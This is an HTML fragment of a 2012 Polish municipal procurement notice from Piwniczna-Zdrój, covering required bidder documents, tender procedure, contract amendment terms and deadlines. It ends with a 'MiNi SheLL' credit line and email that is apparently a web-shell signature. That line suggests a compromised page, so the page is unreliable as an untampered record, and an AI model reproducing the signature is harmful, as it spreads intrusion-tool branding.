<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>A. Na ofertę składają się następujące dokumenty i załączniki:
A.1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę
A.2) Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych.
A.3) Oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia z art. 24 ust. 1 Prawa zamówień publicznych
A.4) Wykaz osób do kontaktow z zamawiającym
 A.5) [o]  Wzór umowy 
 A.6) Dokumenty potwierdzające posiadanie uprawnień / pełnomocnictw osób składających ofertę, o ile nie wynikają z przepisów prawa lub z przedstawionych dokumentów rejestrowych.
  A.7) Inne dokumenty zgodnie z SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W związku z brzmieniem art.144 ustawy, Zamawiający przewiduje następujące możliwości dokonania  zmiany niniejszej umowy:
1)	w zakresie przedmiotu zamówienia,  których nie dało się  przewidzieć w chwili podpisania umowy, a w szczególności:
a)	w sytuacji pojawienia się na rynku nowych rozwiązań technologicznych                                      i materiałowych
b)	zmiana terminów wykonania dostaw, zwłaszcza gdy dotrzymanie terminu wskazanego pierwotnie  okazało się niemożliwe z powodów, za które nie ponosi odpowiedzialności Wykonawca
2)	w zakresie zmniejszenie wynagrodzenia ,zwłaszcza w sytuacji zmniejszenia zakresu dostaw,
w zakresie terminów realizacji - jeżeli pojawiły się okoliczności. których nie można było przewidzieć                w chwili zawierania umowy.
3)	w zakresie zmniejszenia lub zwiększenia wynagrodzenia w zawiązku ze zmianą stawki VAT           w zakresie przedmiotu zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.piwniczna.pl  baner BIP link Zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy Piwniczna-Zdrój
33-350 Piwniczna-Zdrój, ul.Rynek 20.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.11.2012 godzina 10:00, miejsce: Urząd Miasta i Gminy Piwniczna-Zdrój
33-350 Piwniczna-Zdrój, ul.Rynek 20
Pokój nr 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 06.12.2012.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com